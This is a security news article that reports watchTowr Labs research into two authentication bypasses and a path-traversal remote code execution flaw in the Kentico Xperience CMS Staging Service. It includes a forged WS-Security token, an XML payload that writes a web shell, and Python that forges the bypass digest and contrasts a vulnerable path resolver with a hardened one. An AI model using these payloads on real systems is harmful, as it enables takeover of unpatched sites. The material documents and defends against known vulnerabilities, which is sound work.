Cyber Security News

Kentico Xperience CMS Vulnerability Enables Remote Code Execution

Research published by watchTowr Labs has brought to light vulnerabilities in Kentico Xperience, a widely deployed Content Management System (CMS), that pose significant risk to the organisations running it.

Two primary issues were identified, an Authentication Bypass and a Post-Authentication Remote Code Execution (RCE) vulnerability, along with a second, separate Authentication Bypass found later.

Chained together, the authentication bypass and the post-authentication RCE let an unauthenticated attacker take full control of the CMS.

Kentico Xperience is a popular enterprise-level CMS written in C#, widely used by large businesses. Despite its widespread adoption, the CMS had a surprisingly low number of critical vulnerabilities reported before this discovery.

As watchTowr Labs noted, this scarcity of prior reports, coupled with the valuable data the CMS manages, makes Kentico an attractive target for attackers.

Authentication Bypass Vulnerability (WT-2025-0006)

The first vulnerability, WT-2025-0006, was an Authentication Bypass affecting versions before Kentico Xperience 13.0.173.

The vulnerability lies in the Staging Service API. The service is not enabled by default, but where it is enabled it is commonly configured for username/password authentication rather than X.509 certificate authentication, and that is the configuration affected.

The target is the CMS.Synchronization.WSE3.SyncServer service, which uses WS-Security (WSE3) to authenticate SOAP requests.

WSE3's Microsoft.Web.Services3.Security.Tokens.UsernameTokenManager class verifies UsernameToken passwords, and it obtains the expected password for a given username by calling the application's AuthenticateToken override.

Kentico's override, however, returned an empty string as the expected password for a username that does not exist instead of throwing an exception.

WSE3's own validation rejects a token that sends an empty password in clear text (PasswordText), but the hashed variant (PasswordDigest) compares the supplied digest against Base64(SHA-1(nonce + created + password)) computed from the server-side password.

Since the attacker chooses both the Nonce and the Created timestamp, and the server-side password for an unknown username is the empty string, they can compute a digest the server will accept for any non-existent username, as in the token below.

<wsse:UsernameToken>
  <wsse:Username>watchTowr</wsse:Username>
  <wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">OZ/c8o7h3mtigow7HXu0f+BUgLk=</wsse:Password>
  <wsse:Nonce>MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM=</wsse:Nonce>
  <wsu:Created>2025-01-01T03:34:56Z</wsu:Created>
</wsse:UsernameToken>

Post-Authentication Remote Code Execution (WT-2025-0007)

Once authenticated, an attacker can call the ProcessSynchronizationTaskData method of the Staging API. This method deserializes the supplied StagingTaskData with SoapFormatter; the deserialization itself is hardened, but the legitimate functionality it exposes is powerful enough on its own.

That functionality includes creating and updating objects within Kentico, notably media files. The TaskData XML describes the object to write, and the FilePath field of a Media_File record is used to build the on-disk location without being confined to the media library, giving a path traversal that lets the attacker write files to arbitrary locations.

Setting FilePath to a path outside the media library, such as ../../../../../../../../inetpub/wwwroot/Kentico13/CMS/CMSPages/, places the file in a web-served directory, so an .aspx web shell written this way can simply be requested over HTTP to achieve RCE.

<Media_File>
  <FileID>1</FileID>
  <FileName>webshell.aspx</FileName>
  <FileExtension>.aspx</FileExtension>
  <FilePath>../../../../../../../../inetpub/wwwroot/Kentico13/CMS/CMSPages/</FilePath>
  <FileSize>20</FileSize>
  <FileGUID>993e29f9-086b-4110-872f-5cff26968a7b</FileGUID>
</Media_File>
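The following Python is an added example, not code from the article, watchTowr or Kentico. It parses a constructed copy of the Media_File record above, shows how a naive join of the library root, FilePath and FileName lands the write in CMSPages, and contrasts it with an illustrative hardened resolver that normalises the path, requires the result to stay under the library root, and allows only media extensions. The library root path, the benign record and the extension allow-list are assumptions; the hardened version is not Kentico's actual patch.

```python
import ntpath
import xml.etree.ElementTree as ET

# Assumed on-disk root of one site's media library (hypothetical layout, not Kentico's documented path).
MEDIA_ROOT = r"C:\inetpub\wwwroot\Kentico13\CMS\Acme\media\library"

# Assumed policy: only media types may be written into the library.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}

# Constructed copy of the article's Media_File fragment.
MALICIOUS_RECORD = """<Media_File>
  <FileID>1</FileID>
  <FileName>webshell.aspx</FileName>
  <FileExtension>.aspx</FileExtension>
  <FilePath>../../../../../../../../inetpub/wwwroot/Kentico13/CMS/CMSPages/</FilePath>
  <FileSize>20</FileSize>
  <FileGUID>993e29f9-086b-4110-872f-5cff26968a7b</FileGUID>
</Media_File>"""

# Constructed benign record for comparison.
BENIGN_RECORD = """<Media_File>
  <FileID>2</FileID>
  <FileName>logo.png</FileName>
  <FileExtension>.png</FileExtension>
  <FilePath>photos/</FilePath>
  <FileSize>20</FileSize>
  <FileGUID>00000000-0000-4000-8000-000000000002</FileGUID>
</Media_File>"""


def parse_media_file(xml_text: str) -> dict:
    """Flatten the child elements of a Media_File record into a dict."""
    root = ET.fromstring(xml_text)
    return {child.tag: (child.text or "") for child in root}


def resolve_vulnerable(media_root: str, record: dict) -> str:
    """Vulnerable pattern: FilePath is trusted as a folder under the library,
    so '..' segments walk out of it. Windows path semantics via ntpath."""
    return ntpath.normpath(ntpath.join(media_root, record["FilePath"], record["FileName"]))


def resolve_hardened(media_root: str, record: dict) -> str:
    """Illustrative hardening: normalise first, then refuse anything that does not
    stay under the library root, and refuse non-media extensions."""
    root = ntpath.normpath(media_root)
    file_name = record["FileName"]
    if ntpath.basename(file_name) != file_name:
        raise ValueError("FileName must not contain path separators")
    target = ntpath.normpath(ntpath.join(root, record["FilePath"], file_name))
    # Containment check on the normalised result, case-insensitive as NTFS is.
    if not target.lower().startswith(root.lower() + ntpath.sep):
        raise ValueError(f"FilePath escapes the media library: {target}")
    ext = ntpath.splitext(file_name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS or record.get("FileExtension", "").lower() != ext:
        raise ValueError(f"extension not permitted: {ext}")
    return target


def classify(xml_text: str) -> tuple:
    """Return ('write', path) if the hardened resolver accepts the record, else ('blocked', reason)."""
    record = parse_media_file(xml_text)
    try:
        return ("write", resolve_hardened(MEDIA_ROOT, record))
    except ValueError as exc:
        return ("blocked", str(exc))


if __name__ == "__main__":
    for label, xml_text in [("malicious", MALICIOUS_RECORD), ("benign", BENIGN_RECORD)]:
        record = parse_media_file(xml_text)
        print(label, "vulnerable resolver writes to:", resolve_vulnerable(MEDIA_ROOT, record))
        print(label, "hardened resolver:", classify(xml_text))
```

Note that eight `..` segments are more than the assumed root is deep; path normalisation stops at the drive root, so the surplus is harmless to the attacker and the write still lands in CMSPages. The containment check must run on the normalised path, not on the raw FilePath, since a prefix check on the un-normalised string would pass.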

Additional Authentication Bypass (WT-2025-0011)

Another Authentication Bypass vulnerability was discovered in WSE3’s VerifyPassword method.

When the token's PasswordOption is SendNone, VerifyPassword performs no password check at all, so supplying a valid username with no password is enough to authenticate.

On versions 13.0.173 through 13.0.177 the attacker must supply a username that actually exists, because the earlier fix rejects unknown usernames, but common names such as "admin" can be guessed or brute-forced.
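The following Python is an added example that models both WT-2025-0006 (the PasswordDigest over an empty expected password) and WT-2025-0011 (SendNone skipping verification); it is not code from the article, watchTowr, Kentico or WSE3. It implements the WS-Security UsernameToken Profile 1.0 digest, a stand-in for Kentico's AuthenticateToken override that returns an empty expected password for unknown users before 13.0.173 and throws from 13.0.173 on, and a stand-in for WSE3's VerifyPassword dispatching on PasswordOption. The user store, the version-threshold logic and the shape of the 13.0.178 remedy for SendNone (rejecting a token with no password) are assumptions.

```python
import base64
import hashlib
import hmac

# Constructed user store standing in for the CMS user table (not Kentico data).
USERS = {"admin": "CorrectHorseBatteryStaple"}

# Digest from the token shown in the article, kept only so the two can be compared at run time.
PAGE_DIGEST = "OZ/c8o7h3mtigow7HXu0f+BUgLk="


def password_digest(nonce_b64: str, created: str, password: str) -> str:
    """WS-Security UsernameToken Profile 1.0:
    PasswordDigest = Base64(SHA-1(nonce || created || password)), nonce as raw bytes."""
    material = base64.b64decode(nonce_b64) + created.encode("utf-8") + password.encode("utf-8")
    return base64.b64encode(hashlib.sha1(material).digest()).decode("ascii")


def authenticate_token(username: str, version: tuple) -> str:
    """Model of Kentico's AuthenticateToken override, which hands WSE3 the
    expected password for the given username (version thresholds assumed from the article)."""
    if username in USERS:
        return USERS[username]
    if version >= (13, 0, 173):
        raise PermissionError("unknown user")  # WT-2025-0006 fix: fail closed
    return ""  # pre-13.0.173: unknown user silently gets an empty expected password


def verify_password(token: dict, version: tuple) -> bool:
    """Model of WSE3 UsernameTokenManager.VerifyPassword dispatching on PasswordOption."""
    expected = authenticate_token(token["username"], version)
    option = token["option"]
    if option == "SendNone":
        if version >= (13, 0, 178):
            raise PermissionError("password required")  # assumed shape of the WT-2025-0011 fix
        return True  # WT-2025-0011: nothing is compared at all
    if option == "SendPlainText":
        if not token.get("password"):
            raise ValueError("empty PasswordText rejected")  # WSE3 validation closes this route
        return hmac.compare_digest(token["password"].encode(), expected.encode())
    if option == "SendHashed":
        computed = password_digest(token["nonce"], token["created"], expected)
        return hmac.compare_digest(computed.encode(), token["digest"].encode())
    raise ValueError(f"unsupported PasswordOption {option}")


def try_login(token: dict, version: tuple) -> str:
    """Outcome as a string so callers can see accepted / rejected / which check threw."""
    try:
        return "accepted" if verify_password(token, version) else "rejected"
    except (PermissionError, ValueError) as exc:
        return f"error: {exc}"


def forge_digest_token(username: str = "watchTowr",
                       nonce_b64: str = "MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM=",
                       created: str = "2025-01-01T03:34:56Z") -> dict:
    """Attacker side of WT-2025-0006: a digest over the EMPTY password with a nonce and
    Created value of the attacker's choosing (defaults are the values from the article's token)."""
    return {"username": username, "option": "SendHashed", "nonce": nonce_b64,
            "created": created, "digest": password_digest(nonce_b64, created, "")}


def sendnone_token(username: str) -> dict:
    """Attacker side of WT-2025-0011: a real username and no password element."""
    return {"username": username, "option": "SendNone"}


if __name__ == "__main__":
    forged = forge_digest_token()
    print("forged digest:", forged["digest"], "| equals article digest:", forged["digest"] == PAGE_DIGEST)
    for version in [(13, 0, 172), (13, 0, 173), (13, 0, 178)]:
        print(version, "digest for unknown user + empty password:", try_login(forged, version))
        print(version, "SendNone with username admin:", try_login(sendnone_token("admin"), version))
```

Running it shows the two bugs side by side: before 13.0.173 the forged digest is accepted for a username that does not exist, from 13.0.173 the same token errors on the unknown user while SendNone with a real username still sails through, and only the assumed 13.0.178 behaviour closes both. If the printed digest equals the one in the article's token, the server computed PasswordDigest exactly as modelled here.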

Kentico addressed the first Authentication Bypass (WT-2025-0006) in version 13.0.173 by modifying the AuthenticateToken method to throw an exception on invalid usernames.

However, the Post-Auth RCE vulnerability remained unpatched until version 13.0.178.

Affected Product Table

Vulnerability ID | Vulnerability Type | Description | Affected Versions | CVE
WT-2025-0006 | Authentication Bypass | Allows authentication bypass by manipulating WS-Security tokens. | Prior to Kentico Xperience 13.0.173 | None
WT-2025-0007 | Post-Authentication RCE | Enables remote code execution after initial authentication bypass. | Prior to 13.0.178 (for full patch) | None
WT-2025-0011 | Authentication Bypass | Additional bypass vulnerability resolved in 13.0.178. | Prior to 13.0.178 | None

Recommendations:

  • Update Kentico Xperience CMS to the latest version to ensure you have the necessary patches.
  • Disable the Staging Service if not needed, or switch to X.509 authentication.
  • Monitor CMS configurations for unexpected changes or suspicious activity.

Detection scripts for these vulnerabilities are available on GitHub to help security teams verify if their instances are vulnerable.

The vulnerabilities identified in Kentico Xperience CMS underscore the importance of continuous security monitoring and updates.

By chaining these vulnerabilities, attackers can achieve full control over affected systems, highlighting the need for proactive security measures and vendor engagement.

The rapid response from Kentico demonstrates the value of responsible disclosure and patching in mitigating such threats.


Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
